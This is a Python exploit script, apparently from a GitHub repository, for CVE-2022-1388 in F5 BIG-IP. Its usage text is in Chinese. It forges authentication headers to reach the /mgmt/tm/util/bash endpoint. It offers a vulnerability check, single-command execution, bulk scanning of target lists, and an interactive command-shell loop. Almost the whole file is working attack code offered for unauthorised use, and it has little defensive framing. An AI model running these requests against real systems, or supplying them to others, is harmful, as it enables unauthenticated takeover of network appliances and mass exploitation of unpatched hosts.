/
CVE-2022-1388.py
148 lines (119 loc) · 5.53 KB
/
CVE-2022-1388.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
t = int(time.time())
def title():
print('''
_____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____
/ __ \| | | || ___| / __ \| _ |/ __ \/ __ \ / | |____ || _ || _ |
| / \/| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / \ V / \ V /
| | | | | || __||______| / / | /| | / / / / |______|| | \ \ / _ \ / _ \
| \__/\\ \_/ /| |___ ./ /___\ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| |
\____/ \___/ \____/ \_____/ \___/ \_____/\_____/ \___/\____/ \_____/\_____/
Author:Caps@BUGFOR
Github:https://github.com/bytecaps
Remaker:LinJacck
Github:https://github.com/LinJacck
''')
print('''
验证模式:python CVE_2022_1388.py -v -u target_url
攻击模式:python CVE_2022_1388.py -a -u target_url -c command
批量检测:python CVE_2022_1388.py -s -f file
WebShell模式:python CVE_2022_1388.py -r -u target_url
注:如果“验证模式”显示疑似漏洞但无法利用,说明系统已更改默认密码无法未授权攻击。
''')
def headers():
headers = {
'Host': '127.0.0.1',
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
'Content-Type': 'application/json',
'Connection': 'X-F5-Auth-Token',
'X-F5-Auth-Token': '0',
'Authorization': 'Basic YWRtaW46'
}
return headers
def check(url):
try:
target_url = url + "/mgmt/shared/authn/login"
res = requests.get(target_url, verify=False, timeout=3)
if "resterrorresponse" in res.text:
print("[+] 目标 {} 疑似存在漏洞".format(url))
else:
print("[-] 目标 {} 不存在漏洞".format(url))
except Exception as e:
print('url 访问异常 {0}'.format(url))
def attack(target_url, cmd):
attack_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
try:
response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
default = json.loads(response.text)
display = default['commandResult']
print("[+] 目标 {} 存在漏洞".format(target_url))
print('[+] 响应为:{0}'.format(display))
else:
print("[-] 目标 {} 不存在漏洞".format(target_url))
except Exception as e:
print('url 访问异常 {0}'.format(target_url))
def reverse_shell(target_url):
print("[+] 下方输入命令便可持续执行,输入exit退出。")
reverse_url = target_url + '/mgmt/tm/util/bash'
while 1:
CmdData = input("Break> ")
if CmdData == "exit":
break
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(CmdData)}
response = requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
default = json.loads(response.text)
display = default['commandResult']
print(display)
def scan(file):
for url_link in open(file, 'r', encoding='utf-8'):
if url_link.strip() != '':
url_path = format_url(url_link.strip())
check(url_path)
def format_url(url):
try:
if url[:4] != "http":
url = "https://" + url
url = url.strip()
return url
except Exception as e:
print('URL 错误 {0}'.format(url))
def main():
parser = argparse.ArgumentParser("F5 Big-IP RCE")
parser.add_argument('-v', '--verify', help=' 验证模式 ',action='store_true', default=False)
parser.add_argument('-u', '--url', type=str, help=' 目标URL ')
parser.add_argument('-a', '--attack', help=' 攻击模式 ',action='store_true', default=False)
parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')
parser.add_argument('-s', '--scan', help=' 批量模式 ',action='store_true', default=False)
parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
parser.add_argument('-r', '--shell', help=' WebShell模式 ',action='store_true', default=False)
args = parser.parse_args()
verify_model = args.verify
url = args.url
attack_model = args.attack
command = args.command
scan_model = args.scan
file = args.file
shell_model = args.shell
if verify_model is True and url is not None:
check(url)
elif attack_model is True and url is not None and command is not None:
attack(url, command)
elif scan_model is True and file is not None:
scan(file)
elif shell_model is True and url is not None:
reverse_shell(url)
else:
sys.exit(0)
if __name__ == '__main__':
title()
main()